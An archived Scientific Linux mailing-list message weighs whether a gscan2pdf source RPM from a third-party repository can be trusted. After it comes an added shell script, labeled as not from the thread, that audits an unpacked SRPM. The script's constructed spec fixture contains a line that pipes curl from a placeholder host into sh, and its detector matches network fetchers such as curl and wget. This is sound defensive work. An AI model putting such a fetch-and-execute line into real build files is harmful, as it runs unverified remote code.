SCIENTIFIC-LINUX-USERS Archives

May 2020

SCIENTIFIC-LINUX-USERS@LISTSERV.FNAL.GOV

Subject:
From:
Yasha Karant <[log in to unmask]>
Reply To:
Yasha Karant <[log in to unmask]>
Date:
Mon, 18 May 2020 16:15:04 -0700
Content-Type:
text/plain
Parts/Attachments:
text/plain (51 lines)
On 5/18/20 4:54 AM, Nico Kadel-Garcia wrote:
> On Mon, May 18, 2020 at 2:13 AM Akemi Yagi <[log in to unmask]> wrote:
>> On Sun, May 17, 2020 at 8:18 PM Yasha Karant <[log in to unmask]> wrote:
>>> I have found gscan2pdf on the NUX repo, but installing this repo
>>> evidently will add and replace many utilities, etc., that may not be
>>> wise.  gscan2pdf runs fine on Ubuntu 18 LTS as I just put in on my
>>> wife's 2-in-1 that does not have tablet write-on support under SL 7 as
>>> far as I can determine.  Is there any SL 7.8 compatible gscan2pdf that
>>> works?
>>>
>>> Take care.  Stay safe.
>>>
>>> Yasha Karant
>> I've been using gscan2pdf from the nux-dextop repository without any
>> issue. Also, this repository, together with EPEL, should not overwrite
>> any base package.
>>
>> Akemi
> I'm personally reluctant to trust third party RPM repositories from
> Romania, they have a very active and abusive cracker community, but the
> SRPM from
> https://li.nux.ro/download/nux/dextop/el7/SRPMS/gscan2pdf-1.2.5-2.el7.nux.src.rpm
> looks clean and builds well.
Nico,

If you are building from a src RPM, unless you read the source code or 
have a very good automated code scanner (as done by some of the 
clandestine and other security agencies), how do you know that there is 
no "malware" embedded in the source? For example, a "clean" source may 
require the use of a compromised library or (in the cases of fork and 
exec) executable, unless no related RPMs (or DEB, etc.) come from the 
repo that may be questionable.  Akemi indicates no problem from 
experience, but does Akemi have safeguards and "sniffers" running that 
would detect an inappropriate packet being transmitted (that might 
contain root password or other "sensitive" information)?

If you have built the RPM and are reasonably confident that it is 
"clean", could you kindly post or supply the exact build script that you 
used, including any other RPMs that are required but that come from 
trusted repos?

I generally trust SL (and EPEL, ElRepo, Oracle, Canonical, Mozilla, 
Libreoffice, etc.), but I get worried about repos and sources from 
nation-states or entities with large scale compromise organizations 
(e.g., professional "organized criminal" enterprises or clandestine 
services "backdoors").

Take care.  Stay safe.

Yasha Karant
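An added example, not part of this thread and not tooling from the nux-dextop repository or the gscan2pdf project: the checks a practitioner would actually run on a third-party SRPM before trusting it. Nothing here answers Yasha's question by reading the source for you; it narrows what must be read. The idea is that an SRPM from a repo you do not trust is acceptable when (a) the repo's signature on it verifies against a key you obtained separately, (b) the tarball inside it is byte-for-byte the upstream release, which you confirm against a hash obtained from upstream and not from the repo itself, and (c) the spec's %prep/%build/%install scriptlets apply only the shipped patches and fetch nothing over the network. Once (b) and (c) hold, the only vendor-authored code left to read is the spec and the patch files. The signature check and unpacking use the standard rpm tools and are shown as comments because they need rpm installed; the checks on the unpacked directory use only coreutils and awk. Every function name, the spec fixture, the example.invalid URLs and the hash parameter are constructed for this example; the spec content does not describe the real gscan2pdf package.

```shell
#!/bin/sh
# Audit of an unpacked SRPM directory (example code, not from the thread).
#
# Assumed preparatory steps with the stock rpm tools, run by hand:
#   rpm --import <repo-key-file-you-obtained-and-checked-separately>
#   rpm -K --verbose gscan2pdf-1.2.5-2.el7.nux.src.rpm      # who signed it?
#   mkdir srpm && cd srpm \
#     && rpm2cpio ../gscan2pdf-1.2.5-2.el7.nux.src.rpm | cpio -idmv
# EXPECTED_SHA256 below is the upstream release tarball hash, taken from the
# upstream project or a distribution you already trust, never from the repo
# under audit.

# Print every Source/Patch tag value declared in SPECFILE, one per line.
spec_sources() {
    grep -Ei '^(Source|Patch)[0-9]*[[:space:]]*:' "$1" | sed 's/^[^:]*:[[:space:]]*//'
}

# Return 0 if FILE's SHA-256 equals EXPECTED, 1 otherwise.
check_tarball_hash() {
    actual=$(sha256sum "$1" | cut -d' ' -f1)
    [ "$actual" = "$2" ]
}

# Print any line inside a build or scriptlet section that invokes a network
# fetcher. Such a line means part of the build comes from somewhere the
# tarball hash does not cover. Exit status 1 when at least one line is found.
scriptlet_network_calls() {
    awk '
        /^%(prep|build|install|check|pre|post|preun|postun|pretrans|posttrans)([[:space:]]|$)/ { in_script = 1; next }
        /^%(files|changelog|description|package)([[:space:]]|$)/ { in_script = 0; next }
        in_script && /(^|[^[:alnum:]_])(curl|wget|git|pip|pip3|cpan|npm|gem)([^[:alnum:]_]|$)/ { print; found = 1 }
        END { exit found ? 1 : 0 }
    ' "$1"
}

# Audit DIR (an unpacked SRPM): list what the spec references, verify
# TARBALL against EXPECTED_SHA256, and fail on scriptlets that fetch code.
# Returns 0 only when every check passes.
audit_srpm_dir() {
    dir=$1; expected=$2; tarball=$3
    spec=$(ls "$dir"/*.spec 2>/dev/null | head -n 1)
    [ -n "$spec" ] || { echo "FAIL no .spec file in $dir"; return 1; }
    status=0
    echo "== sources and patches declared in $(basename "$spec") =="
    spec_sources "$spec"
    if check_tarball_hash "$dir/$tarball" "$expected"; then
        echo "OK   $tarball matches the upstream hash"
    else
        echo "FAIL $tarball does NOT match the upstream hash"; status=1
    fi
    if scriptlet_network_calls "$spec"; then
        echo "OK   no network fetches in build scriptlets"
    else
        echo "FAIL build scriptlets fetch from the network (lines above)"; status=1
    fi
    return $status
}

# Constructed fixture standing in for an unpacked SRPM. The spec is made up
# for this example and deliberately contains one network fetch in %build.
make_fixture() {
    d=$(mktemp -d)
    printf 'not a real tarball, just bytes for the hash check\n' > "$d/gscan2pdf-1.2.5.tar.gz"
    cat > "$d/gscan2pdf.spec" <<'EOF'
Name:           gscan2pdf
Version:        1.2.5
Release:        2%{?dist}
Source0:        http://example.invalid/gscan2pdf-1.2.5.tar.gz
Patch0:         gscan2pdf-example-local.patch

%description
Constructed spec for the audit example.

%prep
%setup -q
%patch0 -p1

%build
curl -s http://example.invalid/extra.sh | sh
make

%files
%{_bindir}/gscan2pdf
EOF
    echo "$d"
}

# Usage: sh srpm-audit.sh <unpacked-srpm-dir> <expected-sha256> <tarball-name>
if [ "$#" -eq 3 ]; then
    audit_srpm_dir "$1" "$2" "$3"
fi
```

Run against the constructed fixture the audit fails on the %build line that pipes curl into sh and passes once that line is removed; against a real unpacked SRPM the interesting output is the list of Patch files, which together with the spec is the entire body of vendor-authored code left to read once the tarball hash matches upstream.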
